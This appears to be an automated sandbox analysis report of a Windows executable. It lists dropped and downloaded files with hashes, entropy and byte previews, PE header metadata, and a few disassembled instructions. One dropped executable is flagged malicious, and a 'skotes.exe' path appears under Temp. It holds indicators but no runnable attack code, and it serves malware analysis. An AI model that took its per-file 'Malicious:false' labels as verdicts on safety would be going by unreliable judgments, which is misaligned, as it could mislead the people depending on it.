                                                                                                                                                                                                                                                                                                                    Preview:'use strict';function aa(){return function(a){return a}}function ba(){return function(){}}function k(a){return function(){return this[a]}}function ca(a){return function(){return a}}var n;function da(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ea=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function fa(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var q=fa(this);function r(a,b){if(b)a:{var c=q;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ea(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new Ty
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):138356
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                                                    MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                                                    SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                                                    SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                                                    SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....|..F....|....V....w.%t.y..?..&..a..<.n....S+|..=.ra.....
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):1947648
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.950008158846607
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:kxjt3XoWPCffcrq4+mGRpxe+mHg7OwhW3mtu90feqNB9ULK+Ea:iVomCffCGmGRnetcTEckNqNcK+Ea
                                                                                                                                                                                                                                                                                                                    MD5:FA098B363F56394EB669A96201D3521D
                                                                                                                                                                                                                                                                                                                    SHA1:76ECC170B800C1EC06E738A7B5E36E71233F8F2A
                                                                                                                                                                                                                                                                                                                    SHA-256:40FC948CD1A58CB92A7A43D066FD250EF34AD52984EFB82950C20BD60E7CF21F
                                                                                                                                                                                                                                                                                                                    SHA-512:0C16D78AB94169F9B82DBBE5FABBA0A1B4D8DC7294BB8CD7186334CD9E324A1B09D12BC40C10E661101247F85FDAE1C1A409750D4D906B1A54EC59B9A030B66F
                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................L...........@...........................M...........@.................................W...k.......D.....................L...............................L..................................................... . ............................@....rsrc...D...........................@....idata ............................@... ..+.........................@...aqmlcjde.....02.....................@...yinsocgv......L.....................@....taggant.0....L.."..................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\DocumentsGDHDHJEBGH.exe
                                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                    Size (bytes):306
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5080896168654925
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:6:13CGkDZXUKJUEZ+lX1CGdKUe6tcVAkXIEZ8MlW8+y0lBuIut0:13qlvJQ1CGAFMkXd8kX+VBuxt0
                                                                                                                                                                                                                                                                                                                    MD5:DF1EAAD2ADBEE7DA6366FDD73FB9B690
                                                                                                                                                                                                                                                                                                                    SHA1:468C9945906331ABACCB141F041389CAE0B1DF18
                                                                                                                                                                                                                                                                                                                    SHA-256:B56C11D0E893ACF04F72CD48387CD58F49359CD30CEE68558190B4E36887FD33
                                                                                                                                                                                                                                                                                                                    SHA-512:C1ACDE62C1A0256942B2A7A1F71CE2E47F44FA6C895097E30710FFD82C54FCF1307244021BF20A6913A8E22F7E5EC1EB14C81897390AFA091D8FE4E5C7C719DA
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    Preview:......J...L...k._..F.......<... .....s.......... ....................;.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0.................2.@3P.........................
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (4008)
                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                    Size (bytes):4013
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.806273566819102
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:96:fXZw+wliiIN6666d+r3Sl6XIuzBih3eJaQzQupRIa8hfffffo:fZwfyN6666UC0AhOJxQupRIav
                                                                                                                                                                                                                                                                                                                    MD5:AE858BA0B4200C854568999CDE6E3054
                                                                                                                                                                                                                                                                                                                    SHA1:7066E45B0C5437C5498E415C7A30633F2BC66385
                                                                                                                                                                                                                                                                                                                    SHA-256:A54BDB2A4DA129632BA4F78FDE541DDCE27EA90896D88DBBA81D16DD534D7037
                                                                                                                                                                                                                                                                                                                    SHA-512:8BE6EBDCBDE0E40CCC7C9F2E5324F29CA03092B9984ABDD134F1AE8CCBDF8152F1C844E0BFAF9D629FAD8309BC3A08EE64E5D07582ED9F6165B32EFD445DBDAD
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                                                                                    Preview:)]}'.["",["charlie brown thanksgiving","ny rangers trade rumors","rockstar games gta 6","weather forecast snow storm","nasa greenland base","moana 2 end credits scene","ipl auction ipl 2025","macy employee expenses"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"google:entityinfo":"CgkvbS8wNHFuMjQSCTE5NzMgZmlsbTLjEWRhdGE6aW1hZ2UvanBlZztiYXNlNjQsLzlqLzRBQVFTa1pKUmdBQkFRQUFBUUFCQUFELzJ3Q0VBQWtHQndnSEJna0lCd2dLQ2drTERSWVBEUXdNRFJzVUZSQVdJQjBpSWlBZEh4OGtLRFFzSkNZeEp4OGZMVDB0TVRVM09qbzZJeXMvUkQ4NFF6UTVPamNCQ2dvS0RRd05HZzhQR2pjbEh5VTNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTi8vQUFCRUlBRUFBS3dNQkVRQUNFUUVERVFIL3hBQWJBQUFDQWdNQkFBQUFBQUFBQUFBQUFBQUVCUUlHQUFFREIvL0VBRE1RQUFFRUFRSUZBUVlEQ1FBQUFBQUFBQUVDQXdRUkJRQWhCaElUTVVGUkltRnhnWkd4RkJYQkJ5TXlNMEpTVTlIdy84UUFHZ0VBQWdNQkFRQUFBQUFBQUFBQUFBQUFBUU1BQWdRRkJ2L0VBREFSQUFFRUFRSUVBd1VKQUFBQ
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                                                                                    MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                                                                                    SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                                                                                    SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                                                                                    SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                    Size (bytes):132974
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4353363586026395
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:fpkX3ioI5wrfFiC8jMbk/5xnRTpvsMTwR2i6o:fi3dDFqr/5xnRTpvrwR8o
                                                                                                                                                                                                                                                                                                                    MD5:37D34A8008DC6EB30564D39C62460293
                                                                                                                                                                                                                                                                                                                    SHA1:EE71C081EE8A421C116C6FA8DE73DB24B16BC227
                                                                                                                                                                                                                                                                                                                    SHA-256:CD94CA750DFBFEDFDB2006EDC6E5A1718A9861073B1C284C195580F4EA61CA98
                                                                                                                                                                                                                                                                                                                    SHA-512:2BD27C711DDA274D1C6190E1ED894189A6B73D7ED83960E0F37C415E58017D5C289CBA476B65884392E4B419E7A0919FE3B6F143F62208E5BCAFF9720AF2827C
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                                                                                    Preview:)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (5162), with no line terminators
                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                    Size (bytes):5162
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.3503139230837595
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:96:lXTMb1db1hNY/cobkcsidqg3gcIOnAg8IF8uM8DvY:lXT0TGKiqggdaAg8IF8uM8DA
                                                                                                                                                                                                                                                                                                                    MD5:7977D5A9F0D7D67DE08DECF635B4B519
                                                                                                                                                                                                                                                                                                                    SHA1:4A66E5FC1143241897F407CEB5C08C36767726C1
                                                                                                                                                                                                                                                                                                                    SHA-256:FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
                                                                                                                                                                                                                                                                                                                    SHA-512:8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd,qcwid/excm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/ct=zgms/rs=AA2YrTs4SLbgh5FvGZPW_Ny7TyTdXfy6xA"
                                                                                                                                                                                                                                                                                                                    Preview:.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2802)
                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                    Size (bytes):174866
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.55119411677623
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:WEBR5OnrJtUy+9+thjN33FhJpGha9HMRWIjFBJBHTZPYb62+vQ1jV9HyT++Wq7ki:WKR5Or8y+9+tdFFhJchaZMRWIhBJBHTl
                                                                                                                                                                                                                                                                                                                    MD5:E75DAA83A93E581139D8AD8EE8D62358
                                                                                                                                                                                                                                                                                                                    SHA1:AC0DED87D443840A77B446D53DA22BFD52441D5C
                                                                                                                                                                                                                                                                                                                    SHA-256:177BD25B85BF254F44B515271222B773D2CF618FA17587D2DD507CE2104A3542
                                                                                                                                                                                                                                                                                                                    SHA-512:50FD351CB34D216BC443BC8A3FD2773925FC7151B180E5F697750B356A2649AC302E1FEF4575416C02FF04498F877EB4326F5B21AAC713AAAA38ED6E8BB65C43
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    URL:"https://www.gstatic.com/og/_/js/k=og.qtm.en_US.Z8FBMQoacoc.2019.O/rt=j/m=q_dnp,qmd,qcwid,qapid,qald,qads,q_dg/exm=qaaw,qabr,qadd,qaid,qalo,qebr,qein,qhaw,qhawgm3,qhba,qhbr,qhbrgm3,qhch,qhchgm3,qhga,qhid,qhidgm3,qhin,qhlo,qhlogm3,qhmn,qhpc,qhsf,qhsfgm3,qhtt/d=1/ed=1/rs=AA2YrTt16WS-AyvNEln9-TaO-tZR_15utQ"
                                                                                                                                                                                                                                                                                                                    Preview:this.gbar_=this.gbar_||{};(function(_){var window=this;.try{._.Yi=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Zi=class extends _.Q{constructor(){super()}};.}catch(e){_._DumpException(e)}.try{.var $i,aj,ej,hj,gj,cj,fj;$i=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};aj=function(){_.Na()};ej=function(a,b){(_.bj||(_.bj=new cj)).set(a,b);(_.dj||(_.dj=new cj)).set(b,a)};hj=function(a){if(fj===void 0){const b=new gj([],{});fj=Array.prototype.concat.call([],b).length===1}fj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ij=function(a,b,c){a=_.tb(a,b,c);return Array.isArray(a)?a:_.Fc};._.jj=function(a,b){a=(2&b?a|2:a&-3)|32;return a&=-2049};_.kj=function(a,b){a===0&&(a=_.jj(a,b));return a|1};_.lj=function(a){return!!(2&a)&&!!(4&a)||!!(2048&a)};_.mj=function(a,b,c){32&b&&c||(a&=-33);return a};._.pj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ij(a,b,d);var k=h[_
                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                    Size (bytes):1660
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.301517070642596
                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                    SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                                                                                                                                                                                                    MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                                                                                                                                                                                                    SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                                                                                                                                                                                                    SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                                                                                                                                                                                                    SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                    URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                                                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.943634645145396
                                                                                                                                                                                                                                                                                                                    TrID:
                                                                                                                                                                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                                    File name:file.exe
                                                                                                                                                                                                                                                                                                                    File size:1'854'976 bytes
                                                                                                                                                                                                                                                                                                                    MD5:40fbf66fe2c47dcd8d2de9191b48b355
                                                                                                                                                                                                                                                                                                                    SHA1:eb7260a1cf345b9a225fa6250727db32e391ffd6
                                                                                                                                                                                                                                                                                                                    SHA256:c5723c29a13feb389fd9e72e6e81d914c0693d9846c2810d1d0bad4e3307eb78
                                                                                                                                                                                                                                                                                                                    SHA512:2d4328dea1251bd7694c4f1b42f7bf5efad6b8712364bd42db6f8ba612dffd430b6e4bc158756c5e68d9aa24b0904cdff7ac7fde06cdf2826f062077415d0690
                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:tai5lapixRQLHDfUG2XIBlCE7MFKMM68xbEYGXxhA:gi58iLU32YBlCE7MFld8aYGXj
                                                                                                                                                                                                                                                                                                                    TLSH:CD8533B956A3BA6ED15B0EB054CF0BA8B50B2E9F150531332CA49713EBDFD4FD249062
                                                                                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..
                                                                                                                                                                                                                                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                                                                                                                    Entrypoint:0xab1000
                                                                                                                                                                                                                                                                                                                    Entrypoint Section:.taggant
                                                                                                                                                                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                                    Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                                                                                                                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                                                                                                                                                                    OS Version Minor:1
                                                                                                                                                                                                                                                                                                                    File Version Major:5
                                                                                                                                                                                                                                                                                                                    File Version Minor:1
                                                                                                                                                                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                                    Subsystem Version Minor:1
                                                                                                                                                                                                                                                                                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                                                                                                                    jmp 00007F99A4E4E32Ah
                                                                                                                                                                                                                                                                                                                    cvttps2pi mm3, qword ptr [eax+eax]
                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                    jmp 00007F99A4E50325h
                                                                                                                                                                                                                                                                                                                    add byte ptr [esi], al
                                                                                                                                                                                                                                                                                                                    or al, byte ptr [eax]
                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], dh
                                                                                                                                                                                                                                                                                                                    add byte ptr [eax], al
